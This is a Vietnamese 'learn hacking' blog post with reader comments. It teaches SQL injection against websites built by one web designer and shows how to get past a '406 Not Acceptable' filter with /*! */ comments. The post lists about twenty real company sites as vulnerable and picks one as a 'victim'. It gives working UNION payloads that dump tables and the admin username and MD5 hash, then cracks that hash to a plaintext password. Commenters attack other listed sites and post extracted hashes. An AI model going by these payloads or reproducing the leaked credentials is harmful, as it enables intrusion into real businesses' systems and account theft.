Seri Tự Học Hacking Những Kiến Thức Cơ Bản Để Trở Thành Hacker-Bài 3 Kỹ Thuật SQL Inject Bypass 406 Not Acceptable

Trong các bài trước , Vô Ưu đã giới thiệu các bạn phương pháp khai thác sql inject Khai thác lỗi cơ bản, Tuy nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể tiếp tục.
Hôm nay Vô Ưu sẽ demo 1 dạng bypass “406 Not Acceptable”


Google dork: Designed by Viet Arrow id=

Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ

http://www.duythinh.com.vn/?do=product&id=48%27
http://www.quangdao.vn/?do=supply&id=3%27
http://www.ttasia.com.vn/?do=services&id=14%27
http://www.lilama45-1.com/index.php?do=subcat&id=2%27&lang=vn
http://www.royalstone.com.vn/?do=products&act=detail&id=54%27&lang=vn
http://www.fsec.com.vn/index.php?do=intro&id=6%27
http://www.pcphumy.com/?do=projects&act=detail&id=19%27
http://www.vinhsang.com/?do=intro&id=3%27
http://www.sosani.com/?do=products&act=detail&cat_id=39&id=144%27&lang=en
http://mayphatdien.net.vn/index.php?do=products&act=list&p_cid=1&p_pid=202%27&l=2
http://dichvuduongsat.com/?do=services&act=detail&id=5%27&lang=en
http://www.caohungco.vn/index.php?do=products&act=detail&cid=74&id=128%27&lang=en
http://dichvuduongsat.com/?do=services&act=detail&id=4%27
http://www.shopdiep.com/index.php?do=products&act=detail&cid=63&id=1606%27
http://suthienthanh.com/?do=products&act=detail&id=23%27&lang=en
http://www.hoanmyco.com/index.php?do=news&act=detail&id=104%27
http://www.locanresort.com/index.php?do=page&id=1%27
http://www.ttasia.com.vn/?do=services&id=14%27
http://www.clicktoner.vn/index.php?do=page&id=2%27
http://vietdoantravel.com/index.php?do=page&id=2%27        
http://sieuthihangchatluong.com/?Id=EStore&Act=View&Man=SanPham&DoanhNghiep=adminva&Cat=acde6754ab29d3c3b521f86041b88834%27

Vô Ưu sẽ chọn 1 victim bất kỳ để khai thác.
Victim:  http://www.ttasia.com.vn/?do=services&id=14

Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản

Bước 1: Check lỗi

Thêm dấu ‘ vào sau con số của đường link có dạng id=
 http://www.ttasia.com.vn/?do=services&id=14
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli


Bước 2:  Tìm số trường cột



http://www.ttasia.com.vn/?do=services&id=14 order by 4-- -     giao diện site bình thường
http://www.ttasia.com.vn/?do=services&id=14 order by 5-- -     giao diện site thay đổi
Vì vậy, số trường cột là 6

Bước 3: Xác định vị trí trường cột bị lỗi

http://www.ttasia.com.vn/?do=services&id=-14 UNION SELECT 1,2,3,4-- -

Đến đây nếu khai thác bình thường sẽ bị chặn lại và xuất hiện 406 Not Acceptable, 80% site bị lỗi này chúng ta có thể bypass thành công bằng cách thêm /*!  */ ở  ở query “select”,  “table_name”, “tables “  và “column_name”.





http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,3,4-- -
Ta thấy xuất hiện số 3, nghĩa nghĩa tại vị trí sô 3, trường cột bị lỗi. Vì thế ta sẽ khai thác tại vị trí này.
Lưu ý phải có dấu – sau con số 1 để xuất hiện vị trí trường cột bị lỗi hay còn gọi là số đẹp.





Bước 4: Xuất ra tên các tables trong database


http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(table_name))),4 from information_schema.tables where table_schema=database()-- -




Đến bước này cũng bị chặn và xuất hiện thông báo tương tự như trên, ta tiếp tục bypass bằng các thêm /*!  */ ở table_name và tables


http://www.ttasia.com.vn/?do=services&id=-14 /*!UNION*/ /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!table_name*/))),4 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -

Thông tin các tables thu được:
admin,banners,counter,intro,intropages,links,news,projects,services            



Tables chứa thông tin về username và password là admin. Vì vậy ta sẽ tiếp tục khai thác tables này.

Bước 5: Xuất ra tên các colums chứa username và password

http://www.ttasia.com.vn/?do=services&id=-14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4 from information_schema./*!columns*/ where /*!table_schema*/=database() and /*!table_name*/=0x61646d696e-- -



Thông tin các columns trong tables admin thu được:    
id,username,password,email

Lưu ý:  

     -          0x tạm hiểu là dùng để nhận dạng khi sử dụng ở dạng mã hex
     -         61646d696e là ký tự admin ở dạng hex.
     -          Link convert các ký tự sang mã hex:
       http://string-functions.com/string-hex.aspx






Bước 6: Xuất ra thông tin của Username và Password

http://www.ttasia.com.vn/?do=services&id=14 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(username,0x2f,password))),4,5,6 from admin-- -


Thông tin về username và password được mã hóa md5 thu được:
nguyen|2a634ab368043b4a026d7b4b52c06f4e



Bước 7:  Crack Password và tìm link admin:

      -          Có nhiều site để crack passwd, ví dụ:
http://md5cracker.org/
ta thu được
user: nguyen
pass: zinlibra

Bước 8 Mò link admin thì các bạn có thể tham khảo một số tool như
web admin finder để tìm
 http://sinhvienit.net/forum/attachment/3204/1274558045/SinhVienIT.Net---Web%20Admin%20Finder.rar.html
Sau khi tìm được link admin chúng ta sẽ tiến hành đăng nhập bằng tài khoản và mật khẩu thu được ở bước số 7

MỌI THẮC MẮC CÁC BẠN ĐỂ LẠI COMMENTS PHÍA DƯỚI MÌNH SẼ GIẢI ĐÁP HỖ TRỢ
Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!

9 nhận xét:

  1. Em đang tập bằng cái link đầu tiên thì tới đây bí a giúp e với
    www.duythinh.com.vn/?do=product&id=-48 /*!UNION*/ /*!SELECT*/ 1,2,3,4,unhex(hex(group_concat(/*!table_name*/))),6 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
    Nó không hiện các colums thì mình nên làm zì hả a
    E dựa theo cách viết của a... Lỗi ở vị trí 5 trường cột bị lỗi... Thì ghi lại 1,2,3,4 còn 5 thì unhex... ở khúc (/*!table_name*/))) thì ghi số sau 5 là 6 phải k a
    Mong a rép sớm e còn test hết :)

    ReplyDelete
    Replies
    1. sr bây giờ mới REP được lý do là mình bị ẩn commets do thằng google+ cập nhập phiên bản nên mình bị mất chức năng này khi chưa cập nhập bây giờ mình mới giúp được bạn :)
      bạn chuyenr -48 thành null xem được không?

      Delete
  2. cái slq injection này có xảy ra trên wordpress ko vậy Vi?

    ReplyDelete
    Replies
    1. hoàn toàn có thể bất cứ mã nguồn nào cũng có thể mắc phải a

      Delete
  3. hoàn toàn có thể anh a

    ReplyDelete
  4. Nhiều người hay thắc mắc hướng dẫn cài đặt phần mềm opera cho máy tính có giúp làm máy tính nhẹ hơn không, ngoài ra hướng dẫn cài đặt cốc cốc cho máy tính cũng có thể giúp máy tính dowload nhưng bộ phim hay, hướng dẫn cách cài đặt skpye cho máy tính sẽ giúp bạn dễ dàng hơn trong việc giao tiếp với những người ở xa huong dan sua dns giúp bạn dễ dàng sử dụng facebook hơn

    ReplyDelete
  5. ad ơi cho tớ hỏi với tớ làm theo cái trang 2 ra được rồi đến bước cuối cùng ko đăng nhập được vô nữa. giúp tớ với
    http://www.quangdao.vn/?do=supply&id=-3 UNION /*!SELECT*/ 1,unhex(hex(group_concat(username,0x2f,password))),3 from admin-- -
    không biết cái nào là id cái nào là mật khẩu hay là nó mã hóa MD5 cả 2

    ReplyDelete
  6. kết quả:
    admin/ffe376b2edc73f0d8,quangdaoco/2e897f3bf26a434c14cf38930e15ece1

    ReplyDelete